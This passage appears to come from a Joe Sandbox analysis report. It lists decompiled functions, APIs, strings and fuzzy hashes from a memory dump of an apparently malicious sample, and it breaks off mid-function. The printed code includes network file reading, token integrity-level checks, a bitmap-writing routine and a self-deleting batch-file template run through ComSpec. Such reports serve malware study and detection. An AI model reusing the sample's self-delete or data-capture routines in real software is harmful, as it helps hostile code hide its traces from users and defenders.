Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: %ID%
API String ID: 2400141425-384985113
Opcode ID: be98eeb6ffd9677e73edc2bb407473a88c6966b006be1a37ef4b7a239454f6dc
Instruction ID: 33fd2a3c8202b26bbc3e5ea99a689f86f290b1e8f1e0785233a93b178a84a2ff
Opcode Fuzzy Hash: be98eeb6ffd9677e73edc2bb407473a88c6966b006be1a37ef4b7a239454f6dc
Instruction Fuzzy Hash: DDF17A71A102499FDB24EF68D8A4AEE7BF9FF48740F144219FE1587291DB30E951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012C332A Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E012C332A(WCHAR* __ecx, intOrPtr __edx) {
				long _t66;
				signed short _t92;
				signed short _t96;
				WCHAR* _t120;
				signed int _t130;
				signed char _t133;
				void* _t140;
				void* _t149;
				void* _t190;
				WCHAR* _t198;
				CHAR* _t201;
				void* _t205;
				void* _t207;

				_t205 = _t207 - 0x78;
				_push(_t130);
				_t198 = __ecx;
				 *((intOrPtr*)(_t205 + 0x60)) = __edx;
				 *((intOrPtr*)(_t205 + 0x70)) = __ecx;
				 *((char*)(_t205 + 0x76)) = 0;
				_t66 = GetFileAttributesW(__ecx);
				_t131 = _t130 | 0xffffffff;
				if(_t66 == (_t130 | 0xffffffff)) {
					L012B17E4(_t198, 0);
				}
				if(E012C3137(L".exe", _t198, _t205 - 0x3a4, 0) != 0 && E012C3137(0, _t198, _t205 - 0x6b0, 1) != 0) {
					_push(6);
					_push(4);
					_push(_t205 + 0x4c);
					_push(L"SOFTWARE\\Microsoft");
					_t140 = 2;
					if(L012B159B(_t140, 0x80000001) != 0) {
						L012B19F6(_t205 - 0x19c, 0x1e6);
						E012B1285(_t205 - 0x198);
						L012B190B(_t205 - 0x120);
						L012B1BB3(_t205 - 0x110);
						 *((intOrPtr*)(_t205 - 0x19c)) = 0x1e6;
						L012B18B6(_t198);
						L012B194C(_t131, _t205 - 0xe, 0x14);
						L012B194C(_t131, _t205 + 6, 0x14);
						L012B194C(_t131, _t205 + 0x1a, 0xa);
						 *((intOrPtr*)(_t205 + 0x64)) = _t205 + 0x24;
						 *((intOrPtr*)(_t205 + 0x68)) = _t205 + 0x2e;
						 *((intOrPtr*)(_t205 + 0x6c)) = _t205 + 0x38;
						_t133 = 0;
						do {
							_push(9);
							_t201 =  *(_t205 + 0x64 + (_t133 & 0x000000ff) * 4);
							_push(4);
							_t149 = 2;
							L012B12FD(_t149, _t201);
							 *(_t205 + 0x77) = 0;
							if(_t133 != 0) {
								while(lstrcmpiA( *(_t205 + 0x64 + ( *(_t205 + 0x77) & 0x000000ff) * 4), _t201) != 0) {
									 *(_t205 + 0x77) =  *(_t205 + 0x77) + 1;
									if( *(_t205 + 0x77) < _t133) {
										continue;
									} else {
									}
									goto L11;
								}
								_t133 = _t133 - 1;
								__eflags = _t133;
							}
							L11:
							_t133 = _t133 + 1;
							_t219 = _t133 - 3;
						} while (_t133 < 3);
						_t92 = L012B1AEB(1, 0xffff);
						 *(_t205 + 0x42) = L012B1AEB(1, 0xffff) & 0x0000ffff | (_t92 & 0x0000ffff) << 0x00000010;
						_t96 = L012B1AEB(1, 0xffff);
						 *(_t205 + 0x46) = L012B1AEB(1, 0xffff) & 0x0000ffff | (_t96 & 0x0000ffff) << 0x00000010;
						L012B16B3(_t205 - 0x854);
						L012B1947(_t205 - 0x4a8, _t205 - 0x848, 0x102);
						_push(_t205 - 0x4a8);
						L012B1271(_t205 - 0x19c, 0x1e6);
						if(E012C3246(_t219, _t205 - 0x19c, _t205 - 0x3a4, 0) != 0) {
							if(L012B1302(1,  *((intOrPtr*)(_t205 + 0x70)), _t205 + 0x68, 0, 0) != 0) {
								 *((intOrPtr*)(_t205 + 0x70)) = L012B1AC3(_t205 + 0x68);
								L012B1104( *((intOrPtr*)(_t205 + 0x70)), 0xa8c0, _t205 - 0x3a4, 1);
								L012B1104( *((intOrPtr*)(_t205 + 0x70)), 0xa8c0, _t205 - 0x6b0, 1);
								_t120 = L012B175D(0xff);
								_t138 = _t120;
								lstrcpyW(_t120, _t205 - 0x3a4);
								_t190 = 0x5c;
								 *((short*)(L012B1ABE(_t120, _t190) + 2)) = 0;
								L012B101E(_t120, 6);
								L012B1104( *((intOrPtr*)(_t205 + 0x70)), 0xa8c0, _t138, 1);
								L012B1933(_t138);
							}
							L012B1947(0x12dca18, _t205 - 0x19c, 0x1e6);
							L012B164F( *((intOrPtr*)(_t205 + 0x60)), _t205 - 0x3a4, 0xffffffff);
							 *((char*)(_t205 + 0x76)) = 1;
						}
						L012B19F6(_t205 - 0x19c, 0x1e6);
					}
				}
				return  *((intOrPtr*)(_t205 + 0x76));
			}

0x012c332b
0x012c3335
0x012c3337
0x012c333a
0x012c333d
0x012c3340
0x012c3344
0x012c334a
0x012c334f
0x012c3355
0x012c3355
0x012c3370
0x012c338f
0x012c3391
0x012c3396
0x012c3397
0x012c33a3
0x012c33ab
0x012c33bf
0x012c33ca
0x012c33d5
0x012c33e0
0x012c33e7
0x012c33ed
0x012c3405
0x012c3419
0x012c3429
0x012c3431
0x012c3437
0x012c343d
0x012c3440
0x012c3442
0x012c3442
0x012c3447
0x012c344b
0x012c3451
0x012c3452
0x012c3457
0x012c345d
0x012c345f
0x012c3472
0x012c3478
0x00000000
0x00000000
0x012c347a
0x00000000
0x012c3478
0x012c347c
0x012c347c
0x012c347c
0x012c347e
0x012c347e
0x012c3480
0x012c3480
0x012c348f
0x012c34ae
0x012c34b1
0x012c34d1
0x012c34d4
0x012c34ec
0x012c34f7
0x012c3500
0x012c351d
0x012c3535
0x012c3543
0x012c3559
0x012c356c
0x012c3576
0x012c357b
0x012c3585
0x012c358d
0x012c3597
0x012c35a4
0x012c35b1
0x012c35b8
0x012c35b8
0x012c35ca
0x012c35da
0x012c35df
0x012c35df
0x012c35eb
0x012c35f0
0x012c33ab
0x012c35fa

APIs

GetFileAttributesW.KERNEL32 ref: 012C3344
lstrcmpiA.KERNEL32(?,?,00000004,00000009,?,0000000A,?,00000014,?,00000014,?,SOFTWARE\Microsoft,?,00000004,00000006), ref: 012C3468

Part of subcall function 012C3246: lstrcpyW.KERNEL32 ref: 012C3296

lstrcpyW.KERNEL32 ref: 012C3585

Strings

o.d, xrefs: 012C359D
.exe, xrefs: 012C3364
SOFTWARE\Microsoft, xrefs: 012C3397

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: lstrcpy$AttributesFilelstrcmpi
String ID: .exe$SOFTWARE\Microsoft$o.d
API String ID: 2460131378-3032552628
Opcode ID: 6f7a0263f751b3cd783f6cb92a42955d55b403e209b2c8d8d27832d864423106
Instruction ID: efcf85ec44a48f401d4d4b87fcf8bf5882fc0b234784f68ebc4c152215b1dfb0
Opcode Fuzzy Hash: 6f7a0263f751b3cd783f6cb92a42955d55b403e209b2c8d8d27832d864423106
Instruction Fuzzy Hash: 0C713371A202595BDB24EF64ECA0BFE37AAAF55340F104169FB4AD7181DE70DA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012BA107 Relevance: 10.7, APIs: 7, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012BA107(WCHAR* __ecx, long __edx, void* _a4) {
				char _v5;
				long _v12;
				WCHAR* _v16;
				signed int _v20;
				long _v24;
				intOrPtr _v30;
				short _v32;
				short _v34;
				intOrPtr _v38;
				void _v40;
				signed int _v46;
				signed int _v48;
				int _v56;
				signed int _v60;
				char _v64;
				signed int _t61;
				void* _t78;
				intOrPtr _t81;
				long _t84;
				intOrPtr _t85;
				void* _t87;
				signed int _t107;
				signed int _t118;
				signed short _t121;
				int _t126;
				void* _t127;

				_t118 = __edx;
				_push( &_v64);
				_t126 = 0x18;
				_v12 = __edx;
				_v16 = __ecx;
				if(GetObjectW(_a4, _t126, ??) != _t126) {
					return 0;
				}
				_t61 = _v46 * _v48 & 0x0000ffff;
				if(_t61 != 1) {
					_t121 = 4;
					if(_t61 > _t121) {
						if(_t61 > 8) {
							_t121 = 0x10;
							if(_t61 > _t121) {
								asm("sbb edi, edi");
								_t121 = (_t121 & 0x00000008) + _t126;
							}
						} else {
							_t121 = 8;
						}
					}
				} else {
					_t121 = 1;
				}
				_v20 = 1;
				asm("sbb ecx, ecx");
				_t127 = L012B1C17(( ~(_t121 - _t126 & 0x0000ffff) & 1 << (_t121 & 0x0000ffff) << 0x00000002) + 0x28);
				if(_t127 != 0) {
					 *_t127 = 0x28;
					 *(_t127 + 4) = _v60;
					 *(_t127 + 8) = _v56;
					 *((short*)(_t127 + 0xc)) = _v48;
					 *((short*)(_t127 + 0xe)) = _v46;
					_t107 = _t121 & 0x0000ffff;
					asm("cdq");
					asm("sbb ecx, ecx");
					 *((intOrPtr*)(_t127 + 0x10)) = 0;
					 *(_t127 + 0x20) = _t107 & _v20;
					 *(_t127 + 0x14) = (( *(_t127 + 4) * _t107 + 0x0000001f & 0xffffffe0) + (_t118 & 0x00000007) >> 3) *  *(_t127 + 8);
					 *((intOrPtr*)(_t127 + 0x18)) = 0;
					 *((intOrPtr*)(_t127 + 0x1c)) = 0;
					 *((intOrPtr*)(_t127 + 0x24)) = 0;
					_v5 = 0;
					_t78 = L012B1C17((( *(_t127 + 4) * _t107 + 0x0000001f & 0xffffffe0) + (_t118 & 0x00000007) >> 3) *  *(_t127 + 8));
					_v20 = _t78;
					if(_t78 != 0 && GetDIBits(_v12, _a4, 0,  *(_t127 + 8), _t78, _t127, 0) > 0) {
						_t84 = 0x28 +  *(_t127 + 0x20) * 4;
						_v24 = _t84;
						_v40 = 0x4d42;
						_t85 = _t84 + 0xe;
						_v30 = _t85;
						_v38 =  *(_t127 + 0x14) + _t85;
						_v34 = 0;
						_v32 = 0;
						_t87 = CreateFileW(_v16, 0x40000000, 1, 0, 2, 0x80, 0);
						_a4 = _t87;
						if(_t87 != 0xffffffff) {
							if(WriteFile(_t87,  &_v40, 0xe,  &_v12, 0) != 0 && WriteFile(_a4, _t127, _v24,  &_v12, 0) != 0 && WriteFile(_a4, _v20,  *(_t127 + 0x14),  &_v12, 0) != 0) {
								_v5 = 1;
							}
							CloseHandle(_a4);
							if(_v5 == 0) {
								L012B1640(_v16);
							}
						}
					}
					L012B1933(_v20);
					L012B1933(_t127);
					_t81 = _v5;
				} else {
					_t81 = 0;
				}
				return _t81;
			}

0x012ba107
0x012ba111
0x012ba114
0x012ba119
0x012ba11c
0x012ba127
0x00000000
0x012ba129
0x012ba137
0x012ba13e
0x012ba147
0x012ba14b
0x012ba150
0x012ba159
0x012ba15d
0x012ba162
0x012ba167
0x012ba167
0x012ba152
0x012ba154
0x012ba154
0x012ba150
0x012ba140
0x012ba142
0x012ba142
0x012ba17a
0x012ba182
0x012ba18f
0x012ba195
0x012ba19e
0x012ba1a7
0x012ba1ad
0x012ba1b4
0x012ba1bc
0x012ba1c3
0x012ba1cf
0x012ba1e0
0x012ba1e5
0x012ba1e8
0x012ba1ed
0x012ba1f0
0x012ba1f3
0x012ba1f6
0x012ba1f9
0x012ba1fc
0x012ba201
0x012ba206
0x012ba232
0x012ba23f
0x012ba242
0x012ba249
0x012ba258
0x012ba25d
0x012ba260
0x012ba264
0x012ba268
0x012ba26e
0x012ba274
0x012ba28c
0x012ba2b4
0x012ba2b4
0x012ba2bb
0x012ba2c4
0x012ba2c9
0x012ba2c9
0x012ba2c4
0x012ba274
0x012ba2d1
0x012ba2d8
0x012ba2dd
0x012ba197
0x012ba197
0x012ba197
0x00000000

APIs

GetObjectW.GDI32(?,00000018,?), ref: 012BA11F

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: d5146b9f2a59098d48abf0b6af36c6dee85252e12a276f1cb1332570ab8191a1
Instruction ID: d1cc0550cc51ce5b967662fa22dd02b769cc4d0b11de5ce1d3c3fdd99bd680b0
Opcode Fuzzy Hash: d5146b9f2a59098d48abf0b6af36c6dee85252e12a276f1cb1332570ab8191a1
Instruction Fuzzy Hash: B051E675950219ABDB24DFA8DC81AFEBBF4FF48390F004529E556E7240E7319A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012D1B0D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E012D1B0D(intOrPtr __ecx, void* __edx, void* __eflags, signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v9;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				signed int _t42;
				char* _t47;
				void* _t83;

				_v68 = __edx;
				_v64 = __ecx;
				ResetEvent(_v68);
				_t42 = L012B1C17(0x1000);
				_v16 = _t42;
				if(_v16 != 0) {
					_v20 = 4;
					__imp__InternetSetStatusCallbackW(_v64, E012D1C95);
					_v8 = _t42;
					 *_a4 =  *_a4 & 0x00000000;
					 *_a8 =  *_a8 & 0x00000000;
					_v9 = 1;
					_t83 = 0x28;
					L012B19F6( &_v60, _t83);
					_v60 = 0x28;
					_v40 = _v16;
					while(1) {
						L3:
						_v36 = 0x1000;
						_t47 =  &_v60;
						__imp__InternetReadFileExA(_v64, _t47, 8, 0);
						if(_t47 == 0) {
							break;
						}
						if(_v36 != 0) {
							if((L012B1C26(_a4,  *_a8 + _v36) & 0x000000ff) != 0) {
								L012B1947( *_a4 +  *_a8, _v16, _v36);
								 *_a8 =  *_a8 + _v36;
								continue;
							}
							_v9 = 0;
							L12:
							asm("sbb eax, eax");
							__imp__InternetSetStatusCallbackW(_v64,  ~(_v8 + 1) & _v8);
							L012B1933(_v16);
							if((_v9 & 0x000000ff) == 0) {
								L012B1933( *_a4);
							}
							return _v9;
						}
						goto L12;
					}
					if(GetLastError() != 0x3e5) {
						_v9 = 0;
						goto L12;
					}
					L012B1334(1,  &_v68, 0, 0xffffffff);
					goto L3;
				}
				L012B1933(_v16);
				return 0;
			}

0x012d1b13
0x012d1b16
0x012d1b1c
0x012d1b27
0x012d1b2c
0x012d1b33
0x012d1b44
0x012d1b53
0x012d1b59
0x012d1b5f
0x012d1b65
0x012d1b68
0x012d1b6e
0x012d1b72
0x012d1b77
0x012d1b81
0x012d1b84
0x012d1b84
0x012d1b84
0x012d1b8f
0x012d1b96
0x012d1b9e
0x00000000
0x00000000
0x012d1bc8
0x012d1be1
0x012d1bfa
0x012d1c0a
0x00000000
0x012d1c0a
0x012d1be3
0x012d1c11
0x012d1c17
0x012d1c20
0x012d1c29
0x012d1c34
0x012d1c3b
0x012d1c3b
0x00000000
0x012d1c40
0x00000000
0x012d1bca
0x012d1bab
0x012d1bbe
0x00000000
0x012d1bbe
0x012d1bb7
0x00000000
0x012d1bb7
0x012d1b38
0x00000000

APIs

ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,012D18A0,00000000), ref: 012D1B1C
InternetSetStatusCallbackW.WININET(?,012D1C95), ref: 012D1B53
InternetReadFileExA.WININET(?,00000028,00000008,00000000), ref: 012D1B96
GetLastError.KERNEL32 ref: 012D1BA0
InternetSetStatusCallbackW.WININET(?,000000FF), ref: 012D1C20

Strings

(, xrefs: 012D1B77

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileLastReadReset
String ID: (
API String ID: 2159071600-3887548279
Opcode ID: b1a579bdeda5245b26e3a9fa5f462e641fe96378db376064f05a551ee35c7750
Instruction ID: af332d2d771e210303137badff14820dfedd575a2fe51bf4edeba6436ecf1c39
Opcode Fuzzy Hash: b1a579bdeda5245b26e3a9fa5f462e641fe96378db376064f05a551ee35c7750
Instruction Fuzzy Hash: 7A415B30D24249EFDF15DFA4E885BECBBB1FF19354F008055E811AB290EBB49A61CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012BE328 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E012BE328(void* __ebx, void* __ecx) {
				char _v8;
				short _v28;
				intOrPtr _v32;
				char _v76;
				short _v596;
				char _v856;
				char _v1396;
				void* _t32;
				char _t57;
				void* _t59;

				_t59 = __ecx;
				if(L012B1546(0, L"bat",  &_v596) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v596,  &_v856);
				_push( &_v856);
				if(L012B128F( &_v8, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _t59) == 0xffffffff) {
					L6:
					L012B1640( &_v596);
					goto L7;
				}
				_t32 = L012B14A1( &_v596, _v8, _t30);
				L012B1933(_v8);
				if(_t32 == 0 || L012B1A8C( &_v1396, 0x10e, L"/c \"%s\"",  &_v596) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v596, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t57 = 0x44;
					L012B15F5( &_v76,  &_v76, 0, _t57);
					_v28 = 0;
					_v76 = _t57;
					_v32 = 1;
					return L012B166D( &_v596,  &_v1396, 0,  &_v76, 0) & 0xffffff00 | _t44 != 0x00000000;
				}
			}

0x012be338
0x012be349
0x012be435
0x00000000
0x012be435
0x012be35d
0x012be369
0x012be37f
0x012be42a
0x012be430
0x00000000
0x012be430
0x012be390
0x012be39a
0x012be3a2
0x00000000
0x012be3ec
0x012be3ee
0x012be3f7
0x012be3fe
0x012be407
0x012be417
0x00000000
0x012be425

APIs

CharToOemW.USER32 ref: 012BE35D
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 012BE3DE

Strings

bat, xrefs: 012BE33B
@echo off%sdel /F "%s", xrefs: 012BE36E
ComSpec, xrefs: 012BE3D9
/c "%s", xrefs: 012BE3AF

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CharEnvironmentVariable
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 2361153823-3344086482
Opcode ID: 08494b14b557b3fc42d746360c5fcb4ae03cfd99033617b0471de59fc019ff3c
Instruction ID: 3078d5910d0584a46078bf887f43694cad2049b9dca1c5e2585b9ebcd4e9f0ba
Opcode Fuzzy Hash: 08494b14b557b3fc42d746360c5fcb4ae03cfd99033617b0471de59fc019ff3c
Instruction Fuzzy Hash: 8B21B772C20119AADB10EAB4ECC5EFF73BDEF55345F044195E905E3184E6789B898B50

Uniqueness

Uniqueness Score: -1.00%

Function 012B4F2A Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012B4F2A(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t20;
				signed char _t21;
				DWORD* _t24;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_t27 = 0;
				if(OpenProcessToken(__ecx, 8,  &_v12) == 0) {
					L14:
					return _t27;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t33 = L012B1C17(_v8);
					if(_t33 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t33, _v8,  &_v8) != 0) {
						_t20 = GetSidSubAuthorityCount( *_t33);
						if(_t20 != 0) {
							_t21 =  *_t20;
							if(_t21 > 0) {
								_t24 = GetSidSubAuthority( *_t33, (_t21 & 0x000000ff) - 1);
								if(_t24 != 0) {
									if( *_t24 >= 0x2000) {
										asm("sbb bl, bl");
										_t27 = 3;
									} else {
										_t27 = 1;
									}
								}
							}
						}
					}
					L012B1933(_t33);
					goto L12;
				}
			}

0x012b4f2d
0x012b4f2e
0x012b4f37
0x012b4f41
0x012b4fd8
0x012b4fdc
0x012b4fdc
0x012b4f5d
0x012b4fce
0x012b4fd1
0x00000000
0x012b4f6a
0x012b4f73
0x012b4f77
0x012b4fcd
0x00000000
0x012b4fcd
0x012b4f8a
0x012b4f8e
0x012b4f96
0x012b4f98
0x012b4f9c
0x012b4fa5
0x012b4fad
0x012b4fb6
0x012b4fc1
0x012b4fc3
0x012b4fb8
0x012b4fb8
0x012b4fb8
0x012b4fb6
0x012b4fad
0x012b4f9c
0x012b4f96
0x012b4fc8
0x00000000
0x012b4fc8

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 012B4F39
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000008,?), ref: 012B4F59
GetLastError.KERNEL32(?,?,00000008,?), ref: 012B4F5F
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,?,?,00000008,?), ref: 012B4F86
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00000008,?), ref: 012B4F8E
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00000008,?), ref: 012B4FA5
CloseHandle.KERNEL32(?,?,?,00000008,?), ref: 012B4FD1

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: be670e431fdb3c5fd21fc814f16b2e2858fc9a3efb318223f6af91bada3b1359
Instruction ID: f5a9e786ffc657fa1221bbaa511b6d282af5dcd3b1b37f82270281461d71edf1
Opcode Fuzzy Hash: be670e431fdb3c5fd21fc814f16b2e2858fc9a3efb318223f6af91bada3b1359
Instruction Fuzzy Hash: F611813266104ABFFB21AA98DCC8EFE7F6EEB05380F140465F602DB052D7219E559721

Uniqueness

Uniqueness Score: -1.00%

Function 012B8060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B8060(signed char __ecx) {
				signed char _v8;
				struct tagLOGFONTW _v100;
				signed int _t15;
				struct HDC__* _t23;

				_v8 = __ecx;
				_t23 = GetDC(0);
				_t15 = MulDiv(_v8 & 0x000000ff, GetDeviceCaps(_t23, 0x5a), 0x48);
				ReleaseDC(0, _t23);
				_v100.lfHeight =  ~_t15;
				_v100.lfWidth = 0;
				_v100.lfEscapement = 0;
				_v100.lfOrientation = 0;
				_v100.lfWeight = 0x190;
				_v100.lfItalic = 0x1000000;
				_v100.lfOutPrecision = 0;
				L012B1947( &(_v100.lfFaceName), "MS Shell Dlg 2", 0xf);
				return CreateFontIndirectW( &_v100);
			}

0x012b806c
0x012b8077
0x012b8088
0x012b8094
0x012b80a5
0x012b80a8
0x012b80ab
0x012b80ae
0x012b80b1
0x012b80b8
0x012b80bf
0x012b80c2
0x012b80d5

APIs

GetDC.USER32(00000000), ref: 012B806F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 012B807C
MulDiv.KERNEL32(?,00000000), ref: 012B8088
ReleaseDC.USER32 ref: 012B8094
CreateFontIndirectW.GDI32(?), ref: 012B80CB

Strings

MS Shell Dlg 2, xrefs: 012B809C

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: MS Shell Dlg 2
API String ID: 3808545654-3198668166
Opcode ID: acdc5daa8c6d81993b54b5d26b30add7e4f8842f3258ca2c1870f5d6f7e0bd58
Instruction ID: ba82cb8aafa68550a37cca786e5d42e42c4b5be30060b9e1f0e2091c64726c75
Opcode Fuzzy Hash: acdc5daa8c6d81993b54b5d26b30add7e4f8842f3258ca2c1870f5d6f7e0bd58
Instruction Fuzzy Hash: 2C012CB1D01358AFDB209FE5EC89AAEBFBCBB09751F440029F206EB144D77449058B60

Uniqueness

Uniqueness Score: -1.00%

Function 012CD271 Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E012CD271(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				int _t46;
				signed int _t47;
				signed short _t57;
				int _t64;
				signed int _t65;
				signed short _t75;
				void* _t79;

				_t69 = __ecx;
